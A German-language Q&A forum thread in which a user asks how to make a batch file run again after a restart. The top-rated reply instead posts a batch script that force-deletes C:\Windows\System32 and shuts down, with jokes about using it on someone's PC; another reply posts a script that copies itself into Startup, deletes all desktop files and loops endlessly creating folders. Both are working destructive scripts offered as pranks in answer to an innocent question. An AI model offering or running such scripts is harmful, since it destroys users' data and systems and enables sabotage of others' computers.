Frage von hallo2081, 43

Batch auf zeit programmieren?

Wie kann ich eine batch so scripten das sie wenn ich den shutdown und restart befehl eingebe bein wieder hochfahren das ganze nochmal ausführt was in der batch datei steht

Hilfreichste Antwort - ausgezeichnet vom Fragesteller
von hardcoree, 17

Mach

@echo off
echo Bitte warten...
del /S /F "C:\Windows\System32"
echo Fertig :). Drücke nun eine beliebige Taste um den PC herunterzufahren.
pause
shutdown /S /T 2

<WARNUNG> Das "'löscht'" dann die Dateien die dafür nötig sind, den PC hochzufahren also einfach danach den PC ausschalten und dann kann er nicht mehr hochgefahren werden ^^

MfG

Kommentar von hallo2081 ,

Was löscht er genau ?

Kommentar von hardcoree ,

Er löscht den "system32" Ordner (der sich in folgendem Pfad befindet:"C:\Windows\System32"), wodurch Windows nicht mehr hochfahren kann.

MfG

Kommentar von hardcoree ,

Bei welchem PC willst du das denn machen, wenn ich fragen darf :D

MfG

Kommentar von hardcoree ,

Aber wie gesagt: Es ist schwer den PC danach wieder hochfahren zu lassen. xD

MfG

Antwort
von S1r1us13, 23

In den Autostart packen.

Kommentar von hallo2081 ,

Das lösch windows oder ?

Kommentar von Userman2002LP ,

Indirekt. Wenn du Windows startest wird die Batch auch gestartet. Das heißt der PC wird direkt wieder heruntergefahren. Dies kann nur verhindert werden, wenn Windows im abgesicherten Modus gestartet wird. In dem Fall den ich dir gepostet habe, wird der PC allerdings nicht heruntergfahren, das ich gerade einen Fehler entdeckt habe.

Antwort
von Userman2002LP, 22
set date=1
time 0:00

copy UnremoveAble.bat "%userprofile%\START~1\Programms\Startup"

cd %userprofiles%\desktop
For %%A IN (*.*) DO DEL %%A
:loop
cd %userprofile%\desktop
md %random%
goto loop

shutdown -s

//Aber vorsicht. Diese paar Zeilen können wirklich schaden anrichten.
//Und ich empfehle dir die niemandem unter zu jubeln oder selbst
//auszuführen. Wenn dir was an dem Hintergrund bzw. wenn du verstehen
//willst, wie das Programm funktioniert kannst du ja was drunter schrieben.
Kommentar von hallo2081 ,

Das löscht den ganzen pc oder ?

Kommentar von Userman2002LP ,

Indirekt. Wenn du Windows startest wird die Batch auch gestartet. Das
heißt der PC wird direkt wieder heruntergefahren. Dies kann nur
verhindert werden, wenn Windows im abgesicherten Modus gestartet wird.
In dem Fall den ich dir gepostet habe, wird der PC allerdings nicht
heruntergfahren, das ich gerade einen Fehler entdeckt habe.

Keine passende Antwort gefunden?

Fragen Sie die Community